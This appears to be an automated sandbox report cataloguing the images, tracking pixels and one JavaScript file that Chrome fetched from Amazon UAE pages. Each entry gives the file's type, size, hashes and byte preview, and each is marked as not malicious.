                                                                                                                                                                                                        URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:B82A0YC1SM3B4A82DCGS$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3DB82A0YC1SM3B4A82DCGS%26m%3D1%26sc%3Dcsa%3AstartVL%26pc%3D5786%26at%3D5786%26t%3D1723729113766%26csmtags%3DstartVL%26pty%3Di18n-preferences-web%26spty%3DsubSelectPreferences%26pti%3Dundefined%26tid%3DB82A0YC1SM3B4A82DCGS%26aftb%3D1%26lob%3D1:5785
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 440 x 440, 8-bit colormap, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):50082
                                                                                                                                                                                                        Entropy (8bit):7.987807532763977
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:5wWpUEXgzwFMHy8pQbzCUDtGJLFJLNshqGvdqpIFkgB8H2C0M5i77n7mCjm:5fDXEIrbzpDtGJLHLaLqoS2CWn7Hm
                                                                                                                                                                                                        MD5:3EAB8728FAA8C817C53784EAEB159B45
                                                                                                                                                                                                        SHA1:9DAFCA9539450E270242A0524311D6FCD463C420
                                                                                                                                                                                                        SHA-256:91617305D0E69D772BB6A8AED058DE9F3E5D6F57B56D2D23D7612BF9976A7B3C
                                                                                                                                                                                                        SHA-512:3120D6A8B53C6D6E74974D883C6DEC9DDF1FD0E59631934DCC119EF16AFC3BC85EDEDA1BEAAA4F707A97DC6C51374740DCAAA105067BBBE97E4C0A9789D32D1B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:.PNG........IHDR.....................PLTE..T..R....................U..S..............Q..V........P........O......-,1...0/4+*/!-<.....M438216#"(..N%$*...&%+...65:('-.-398=..V)(......L..Y....)8...#/>........Q.. .%<;?...%1@..!.....*'3A../...'&'..M+**.$4(5D......$##.....%...$0?..!0//............A@C........T......................444....................GFG......987gghkkl.....aqqr...]]_bbdxxy...TTU;GT...............LLM[doYYZ......(?Q............:Hc_F...goz.....XUB..^:F.NJ:BS...>QPQ...GR^n..CA6.....6@N...QZg...uqSJU.z..igP..l....=.............&..~Wd.px............t....!..._u.".M8E=v..-...X[@N...X]. .z...')...;LQ.zPd..L..KK..??.&/[0.r.99iFW?b...g..[8Rh.DA.....T62)|yZix..d..VpjH.1/06r.......QS........eaj.......).R^^..PO79.."#..W...c.lV.....x.v.01.%...B@..`.NP}...~!..m..'}.~..N8..d.+..Li.h...... .IDATx..M..g..%.MDw.F.t..WfZ.c.=N.{X......%_aO...g...e/._.....[...........|..^.zZ=.&.=d...$'.._....<...?.....>=...>._.Gk...F..e....k..`.]....p...Y...........].7M.ei...HW.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.7374910194847146
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUnl/7yltxlHh/:/+/
                                                                                                                                                                                                        MD5:07FFF40B5DD495ACA2AC4E1C3FBC60AA
                                                                                                                                                                                                        SHA1:E8AC224BA9EE97E87670ED6F3A2F0128B7AF9FE4
                                                                                                                                                                                                        SHA-256:A065920DF8CC4016D67C3A464BE90099C9D28FFE7C9E6EE3A18F257EFC58CBD7
                                                                                                                                                                                                        SHA-512:49B8DAF1F5BA868BC8C6B224C787A75025CA36513EF8633D1D8F34E48EE0B578F466FCC104A7BED553404DDC5F9FAFF3FEF5F894B31CD57F32245E550FAD656A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, baseline, precision 8, 400x39, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):9484
                                                                                                                                                                                                        Entropy (8bit):7.867411824671817
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:q8KIzd4USNdPO/trSgHYDqs0a/6iGwskNpCdqDyP5ve:q8KOd1edPIHUiCqwsEpiPs
                                                                                                                                                                                                        MD5:C8407BB0F31D12AF666791231B078919
                                                                                                                                                                                                        SHA1:B00BD1145454A48D7EEFB8F5251D1ECFDC791012
                                                                                                                                                                                                        SHA-256:2C420C04C72907D95082D29EF4D50DB13D4AD40A44F3649C842CFE5ECBE5B30F
                                                                                                                                                                                                        SHA-512:6B0D4EF1EE10ED92AA320D71C7CD7F24925A2FE0A98D47B433692A342FD25499A7F1DF59F51FCC14BE702095490D3836A954A6E32EBD530497648305FBF7A9F8
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:.............................................................................................................................................2....Adobe.d...........'......................................................................................................!...."1A......#$%&Qa'()*23456789:BCDEFGHIJRSTUVWXYZbcdefghijqrstuvwxyz..........................................................................................8S............!....1A..."Q#2aq.........$%&'()*3456789:BCDEFGHIJRSTUVWXYZbcdefghijrstu..vwxyz..........................................................................................?..=..Eb..Xa..1a.,0......b..Xa..1a.,0......b..Xa..1a.,0......b..Xa..1a.,0......b..Xa..1a.,0......b..Xa..1a.,0......b....=..Eb..Xa..1a....c.f..zZ...e..*..._..a.5+B.!.....6...l..k....jt.X.f.9.CS......UW.....*X6..........H...)qK.-*`in[..],.........TD...!NG@.O..`...@..C%.).Zr..d.VS..TU.=.P.y ...($..n..g)..X.w.zi.XL...`..@\C 1..v.%...B......!.T1D8..n...H......8.8/T.S".....F...
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 165x200, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):10670
                                                                                                                                                                                                        Entropy (8bit):7.967452360122912
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:wTj+3QA3wnNfKS2a1F63GEmoQQEw/4n0W3JpzQ2xiNPLQiFO0hVn/TJAqPH:A+3zcCS2aYmoQQEwwzJNYJQfyVA4
                                                                                                                                                                                                        MD5:17F2BBD6798E35F79DDA2F0EE3F7EB8B
                                                                                                                                                                                                        SHA1:E15D08872720BC93A7790BD177FAB22E67BC77A0
                                                                                                                                                                                                        SHA-256:D7E6B519E9FBFEA68CD6A247EB2D55D4EC057ED9C941B5490D5B9B3C0C61E99E
                                                                                                                                                                                                        SHA-512:5036DE5E86559BF40A8185F16D2712E0BAA93D5AF78072FD9E93DAB305A38FB847B99E44D57F52FFB995194BCC7F6D9E8801C36BC162FD3BA9B4E95853B1EAE3
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!..1."AQ.aq.#2B....CDRT.........$34Sbcrtu....6Us...%5dE..................................................1..R..!AQ...#2q..a.3..."...............?.(.....&...UH..r.tb?@...7..}..][...D..1.".gw.>..3...Da(u......SOWQ5|.`\..Hb).(..X.........Xw..{....R.qo..~.8.]...|...<g..A=Q.kB.$*...G....A.ho.8..3.2.*......6.S......K.9...2....E}.9..........v.....h.... gU.>.......>?.Z...<]3X*i.vE..W...... ..QH...U..41.......Q..N.<.u(.kr.x.=......o..x.>6.6....O.r,H".x... .."..Gn..]...qqYb....Z.M....8.T.3Z..Et..c..S(..}..fA.=..XQ.X.}...P..i.}q...0...]p...../.5.$+Y}>}..1....?...=...PT.........O.<h..|.hq.L.3.s..P.znEh...re.V@.....p..!...x....O....!.[8.....#....Mf.-..'W03G.H....J.3.pw=.z.~~.`...[.].7...M.tlY.=.<[E.$.......F..W....8...7...Bf._.Zi.DO.\.8[....
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:V0ARH6GWVSW29RT7ZWDG$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.295223.0%26id%3DV0ARH6GWVSW29RT7ZWDG%26m%3D1%26sc%3Dcsa%3AstartVL%26pc%3D8132%26at%3D8132%26t%3D1723729140342%26csmtags%3DstartVL%26pty%3DShoppingCart%26spty%3DCart%26pti%3Dundefined%26tid%3DV0ARH6GWVSW29RT7ZWDG%26aftb%3D1%26lob%3D1:8131
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 240x220, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):4356
                                                                                                                                                                                                        Entropy (8bit):7.718352975328784
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:TT0MasIDa6LfwyRA2j9KgiZjUiONbkjaIIc8f7W/JVzWOSGuxSBJDygHLFSdTkbS:TKPdIyzxKn5UpdyX4wVNOxSBPSdTgaR
                                                                                                                                                                                                        MD5:0B9E939D9D3B8B5081A5E9885FB69D01
                                                                                                                                                                                                        SHA1:AF218341176699AD9AED9A76406D523E568FF3A5
                                                                                                                                                                                                        SHA-256:343E26D2BBB10C41E36BA97B3A5056A84ED25AF00529B432A49220408FAA0132
                                                                                                                                                                                                        SHA-512:3722570B7C056E979C19D4F28A5F867B7C8FD616D7A0856645170D5BB6A2C236DC5038A5E465844C35A33BAF5C11168D72A2E896965346D907799B804A727CC5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:"https://m.media-amazon.com/images/I/31uinBOk0cL._SR240,220_.jpg"
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........4.................................................................... .........:u.....V.qw.&n.Ntj.3^.@.....W...M....+.&.K.G......[d......eA*............4..zXd............1.Jx.............b^............h._............+.@,'............<t....rT.(.;...gx..'......cFc.eW....u.$..[.|.i}M'.t.90...7..y.:...-..d.i.9.....3I.......'.o.9._F..._C....Y..x~...=5<Ok.........M.=.#......Mi>......[....>....<.Y.>...hrh..s...i-..............W.....0..g..t.f.@........l.UwK.2...zp..........,.........................!1@.0 "ABQ..23a$R............!..=.:...p.Q.O....;...@...W.M./....}6'.;..c.S..L...A..Sf\7Q...U...S...6=.T{#U.|F.;..82<5.B...tD..{.h.,..:..MOd.#..8.@.X9D....2.O*....m...q...L.NY+m..1..r.......t..D..y.."W.4..O>...S.t_..Z...c.Q>.&.n<.......).q['..F.......s.\......{.E.Nu....>.&l{.1....w.%..T.v...
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):65568
                                                                                                                                                                                                        Entropy (8bit):7.972734414417205
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:vOVvtP7gAcRAbg1KLE/1KFA/YlRe5MaqdonYTqdGNvuyb:vMFP7SRAs1KAYl45MKnYewNvuu
                                                                                                                                                                                                        MD5:7EEDD01A919D7135E14C607DF9F34A8F
                                                                                                                                                                                                        SHA1:D0883DE70E0B06479036934BA9CE23AC870C4900
                                                                                                                                                                                                        SHA-256:CE5801AD5AC28CC87F73784BBA9E6AAE819FB432F15F5C919735453D550B9A11
                                                                                                                                                                                                        SHA-512:962605CB9BA7458BE8E0D719CB57C865BFD72548F6BB5DC98A5DACEF1F8F46E4D6E86F0101D6E949F18276075BC02D4AD805E8CC373585BC663C9986AAC08FAD
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/G/39/Merchandising/BudgetStore/XCM_Manual_1349259_3986223_UAE_Budget_Store_AE_xsite_grocery_en_400x400_2X._CB644457599_.jpg
                                                                                                                                                                                                        Preview:......JFIF......................................................................................................................................................................;.................................................................................X..........F.x.n[.........y..+/.....&.[?0....m................=..,{..u.(.vE....../{.ylf...C.w.u.^_. ..........F>.3..l..c.p.ws........"[..s.4..'.H............6.vh.......:........(...N.k|..,/...........V?..w6v.P`...........6.v.s.....d...........n.sck8.Z...........)5A<zO.r.f. ......C................0..;=..4~K.sKz.=..........mp... .....,...D.#.......T.b..&e.l..C....n.J!..}f.6GK.....GS.V.....?.._.z......Z..l...w5.i..Z@.... h..C.............g%+w;A.....mk.......#x...B.;=.......,w....G...'.:.y.......-r.......GmY.P..{g........./.?.'..0....]0;....]..k>|.}.Z.........*hs...:..........N.9..N.<}.U..w........H.......4.+#.{...V.....~.w.;..v....:M.?.......$...............+wj.yEb....m.]f...7.jY..;Q<y.. ..%h...C.d.L....}+;.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (64565)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):331197
                                                                                                                                                                                                        Entropy (8bit):5.457377606315039
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6144:5w70TUq0mTaL+gsW5MmGaW5gERNmJAK/OaZ05Z:5MRSW5aaW5grJAKrZ05Z
                                                                                                                                                                                                        MD5:8D11E1344E8D218C563D06A64C47EE02
                                                                                                                                                                                                        SHA1:FC949176844C9C12D7AE368311EF1B832DEDDA2E
                                                                                                                                                                                                        SHA-256:FF7231C17F8AC6BB63F69FEEE9F023841DF9D2F8534E0ECCA62E5C8FE376E1BA
                                                                                                                                                                                                        SHA-512:522D4DF630C41CFADBDD966A87419BCC57D5F3FAC2B1C1026C3C11312442144B7A69721FA25914E8F287C93F42C89662571891FA0C2F71B2C9447A934D594F7C
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:;(function(f) {. if (typeof window !== 'undefined') {. . return P.execute('siege-cse', function() {. try {. f();. P.declare('siege-cse', window.SiegeCrypto);. } catch (e) {. try {. . if (window.callPhantom && (!Function.prototype.bind || Function.prototype.bind.toString().replace(/bind/g, 'Error') != Error.toString())) {. console.log('siege-cse does not support PhantomJS 1.x, skipping error reporting');. return;. }. } catch (e) {}.. P.logError(e, 'siege-cse init error: ', 'WARN', 'siege-cse');. return;. }. });. } else if (typeof importScripts !== 'undefined') {. . return f();. } else {. throw new Error('Cannot initialize SiegeCrypto outside window or worker');. }.})(function() {. /////////////////////////.// BEGIN FILE SiegeCrypto.js./////////////////////////./*...Full source (including license, if applicable) included below..*/.!function(e,t){"object"==typeo
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 440 x 440, 8-bit colormap, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):45831
                                                                                                                                                                                                        Entropy (8bit):7.97707742637553
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:tsXUIEBdv1gEmK89KWuPPYi1nWCkflzFY7ieWRMuEvQ1HZUozRn9tokJM17MPVx5:tsHZq89XuoQWVFY7HWRjEvSTt9ttJMVm
                                                                                                                                                                                                        MD5:1C84CE885FF41DE006B4A4DC0E1863E5
                                                                                                                                                                                                        SHA1:E989AB4182AF2E0BC70630D985D1408913D0D808
                                                                                                                                                                                                        SHA-256:557AE587148D54F67321F9FD9545E9421ABD1EF2BB6A19774016EC5B06A66D5A
                                                                                                                                                                                                        SHA-512:5822C37AEC2065B28AAD3F0FE92FFA106E51F3E2B0113C6B63078A3CD0C61655AF500C49C2129D195E0A7CD428102B98C64E017735289D940E714567B4BE071D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:.PNG........IHDR.....................PLTE..U....7,.....S...........T.................V....=5.....R....A:........P....>7...!-<#/>.@8.90$E=!C;.2*..........O&2A.=2.6..:3....'6.......L.....M.p...w.8+...,MD..Y.3'.?6'I@..*.<3. 0..O..{........$.5*.-"...)4C2RJ.&..n...}.4,..N...A`W8YQ........w..._{tWumt...,$Hg_y....zevf...f.zZo^Pmf...m..[cniq{..........p.......}<ER......:UH................w.OdV......F\M......w.t,G:.....fn}n....z..]...x.......GOZ..o....TDS..0........k.;N>QZb.............'...u..........~.QJ.\.k............O.......I=..n!4.@..c....fUA...r..........2=J.................o..\..X..........nk....f.R......f;.l.....B4l{..V.....'....=Q..7.....Z3qa..kg.F.dQ.Ou..G.;6......|...^7[d...X.p..f...q.qJ]|.[..kH...b..q....<.{....go......K....&1.....ic.O.MAX....\.p6......I......).tE.;... .IDATx..Kn.H..A..........[.z..XAFL.2d.G...2........, ...v}...`..V./....t....XLX........s.Z,.\..a}........;.O.i.6....].b.\.h..O.V.=.....j..:;O.y'+.s..........9.....{..'V%....z.Xg98.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 379x304, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):25781
                                                                                                                                                                                                        Entropy (8bit):7.965987596311549
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:70v/om1nzDPGjupe9YFu6npeeG1N3DO+y:Dm1n/GjupegzLGTzOb
                                                                                                                                                                                                        MD5:DD3025FBA8198FE551489BE56F9045FD
                                                                                                                                                                                                        SHA1:6BD2557DD7A1E1AEBBDD9E17C9E50060BC22D44A
                                                                                                                                                                                                        SHA-256:CD08BB063312BC60016C51BAE229CEB5BF9EFF4D8332B4C2F7C84232F55D1158
                                                                                                                                                                                                        SHA-512:7E59FF84DCFD09A2793F99F450A3DB753B49A1833772BC226F827CFB24C7FDC00F013C832B794797BE643DF9DB1F4680F9F039A94AE704563FD605590FFF0E22
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/G/39/kindle/journeys/NDdkMGRmOWYt/NDdkMGRmOWYt-YjI1NWNkYTQt-w379._SY304_CB641947165_.jpg
                                                                                                                                                                                                        Preview:......JFIF......................................................................................................................................................0.{.."..........8.....................................................................................................................o..+b...B..GMO....?~p>.........9>.....>9.m............."..lz./Z-V.j.k...Ts.>.....*..S.T...(E...........H.u.IU~.O..2........(.......z..}.jr..o.t....Q......tn:..s]\..N..J../.....6...S............(.Z.>........r..r3...I.c.0o...{E.Q.iR..t.....v.r@0.S_..*.9....AH\9=..;.....7.f...\.y..E.$x.....dM..e.m{.d........A.>?.OX....Fg.....[..,~.a...f.9..5...&..?...|...W,s.n5[..uy.7.3.]z.c.g.5c.&E..;..B.>....n\|.....mK.h.v.......SM.=.T.u..:.W...1}[.Y......m.G.U...Y*%.....y..t.1.......i.%...........^Q..Y5...Q.X...B.....H.e]W...j.^L..a.F.......P.KCcP...1.^....T+.;c..z:u...r.......$..LS..........]..P..%.....Q.-x...c[..L.......:.w......"... .....=.....k{..a.......>i.....N.\.Wx...F
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 440 x 440, 8-bit colormap, non-interlaced
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):51020
                                                                                                                                                                                                        Entropy (8bit):7.975897458742601
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:xXt/tY21WYpAMFo5H29LV4ggoYRq5r4wuT8yPni+8h82ZL8l2WfS/nK2C5jSIMZS:xTY2E6td1r5rxCHPuh82Zwl2WfgUCZts
                                                                                                                                                                                                        MD5:DA976A4961B2A142A4FCEF1FC9D97736
                                                                                                                                                                                                        SHA1:3FD690D17BBAB092F2B9DAA853539E26E1F1EA7E
                                                                                                                                                                                                        SHA-256:529B7DA2D028EB378393CF16A600012EDD6561EB9A4E6F1CDCA23BFED0D12A65
                                                                                                                                                                                                        SHA-512:5EE73DBB8A0A76293D05C3096F0290C72E88E38DB82E59D02D36F77865C13E8A6949615898D261E143B5A997CAB58BFBECBA7AC43C2E81D6B1CD30E9FF95AADE
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/G/39/electronic/kamja/Events/2024/BTS24/PH1/Nav/OFC/bts_ofc_01_writing_en._CB568181090_.png
                                                                                                                                                                                                        Preview:.PNG........IHDR.....................PLTE..U.......................T..S........V..R".=.....M........O........Q.#....%1@...........K..........7.....+.. ..&...+(4C....)9.).....%4........$..0..Q..........1.....>...L......LLK..........=.....2!edc...TTSDDC..Y....%.]\[....6$.%.Ot.qpo<<;...........T.T.iik.;-:Q..8.---...Zbm...Ha.=FV...443.F..go{BY.Lc.,E....7R..}-H...9Q.Wr..,.uwy%&&Xn....\}.5h.....%..../^.f..... <.....4#Fk.f|.&C.z..KSaF\..............y...L.....6.../9J.......sc..:v..H/....".../G........H..F6......[TK.....E1BR..4.m...cV...'P..[M.N@iy..9+...}8G....Xk.......ra[...L...RHc..dm.....H=.e....y......T^..qj..L.W=..W....`U'1w.to..b......=Cy..Vj73.....<.......l[6=S...x....pRX~.......,...R.I?.y9|...eZ.e5....L..}....O...~.}q.QE..x...wJ..2.8...zq6x....KW.....qLM.]r...`...#.z..@.!.....[.. .IDATx...o.H...8.0.@S.U..p....:Ps....J.u.R.........>...i.M.Evs7.~.Iy...X.H.HZ..~.}...c&.3.t.._....=oM&.z.u.....n..5.[...xM'.Y.Mgs].y.kqj...ZYv..u..i.*.@..'.{O...x...?...'^Y.~..
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1870
                                                                                                                                                                                                        Entropy (8bit):7.482047828772314
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:TT0r6zxzpftLP8C9I2mQkqqoCtGcdK45IYGP0YKpJg0:Tlzb4d2mQhdCS45I7P/M5
                                                                                                                                                                                                        MD5:9269C390D63088EF64FB312CC847C509
                                                                                                                                                                                                        SHA1:3FF02845B184911164546D43C8F4AD6AAD3926EF
                                                                                                                                                                                                        SHA-256:7671F96B975B879403ED7E93F5D22C2FF5EEE2D0260E2960E279588494DEE9E1
                                                                                                                                                                                                        SHA-512:54A737FD7E054BA68CFE2391898685CFD12FFF00FCD139B5BD4278148731329B95AE9C7623208C8A37A6833EB626F7A29EE2D0E720FB9A2991CA98C3F39606EA
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t....".............................................................!1.AQ"q.a.......2BRbr..3................................................1.!.A"2a............?..d.9.@..............J.P..'.C.uZZe.V....g.o....~EwO.j.W...K.Kx.?.*>.2.L...d.w...]......-.8q{o.H.......n.iF..+A.!.t.)<~.o|.5..mY.N....S.|..[.......................q.......i&..\..).?..FMF.....)..c.T5.;.jP.)U.O[jI&.^...'....eO.N.y.mn."....k..s....B.o.:.....8...........R.J.N.O....<....I.z..*.M.^.....I-...+..9.....l....Gu.qp...~3..'..k.,,.6.}....."...;{.xgS....-..,....r.Mi..l.............0V..m..MG..|s..U.B.....e.9..-V......Q4...T.i.7(..6Y..e}_Qvz.K.R....B.9I...1X...e...i..U.jJ..mEO.....,...9e.Z.>....\..J.O.X..F..._\R..$.m.6..}Y.:}:}5-}...S.....>Xk.".....J.....x.)|...ey%...;...%...........^....,.sJ.YC....(.T.t..UYy....4..........K7k..
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 251x200, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):12744
                                                                                                                                                                                                        Entropy (8bit):7.944287956667978
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:t5Z40KA68tpsRsxDcDS1d0wNN9hwKjSAfgJxX7tnZvZvGu3j2cffB:tX3V11cDS1eYSAs9tnZtGu2YfB
                                                                                                                                                                                                        MD5:126677A1E30BB8C699ED38E2A31DD553
                                                                                                                                                                                                        SHA1:AB7C9A93F1CB7A52AD4CF6BCEFDE1D3D4CCD7447
                                                                                                                                                                                                        SHA-256:BA9A3C17D4A04894B425B272C0C222DD0572EB775E49CE0D389C9E4B3D6D757E
                                                                                                                                                                                                        SHA-512:304550B341E76A81416E49BDBE009E76D74B8785A80A6DF98D21AB1C22B1F5A9CEF9976BF389B38DBE30ABD4FC6B2C2A27880BEBE41B6553CC1FA0737AE9E79E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........3................................................................`..}!?I.a........./.|.y...>rt...lM..a.....7..7|..........T.b.&.........l(^...l... .1.*.YgT.)....Lc.D...].......r...Q....L.q.M9.D...S.~.9.....c.W..5.Nkm5O..[.....9....6.....Ep. FlH.......X.-a..C^..9+.m&..YE2.z.e-!.L....K.VvZ......B..>..YCf/....LqI.O8.........Lx...;.YU~-.+..6.c|..:Dc.i....n.,..!kY...L.2h.)f..F..F.+.?...r$r.....o[X..D..;..u.Iaz.....b..c.v.3...IoM`..+...}...e+.veZ.J....AhT1........A.....K&uG....%r@.eq.t.4m...i.D...9....5'_bK....,z.:...U..GP..C.....t_..."..."R(....N3..`j_.Ut.I:.f..+..C..X....=p.a..<....V\......I.(..6...].)......@..G;iS..L..U<...p.iR.w.....1H.l.=I..&Q.+8A,...\.....PS......\.XQk.}.....k.S..W1.E.,...LO..t.. ......+.....W2..o..2@....6._2.1..=....\...T...$ZL...:.7.wb.I2.^..j+w..6...
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
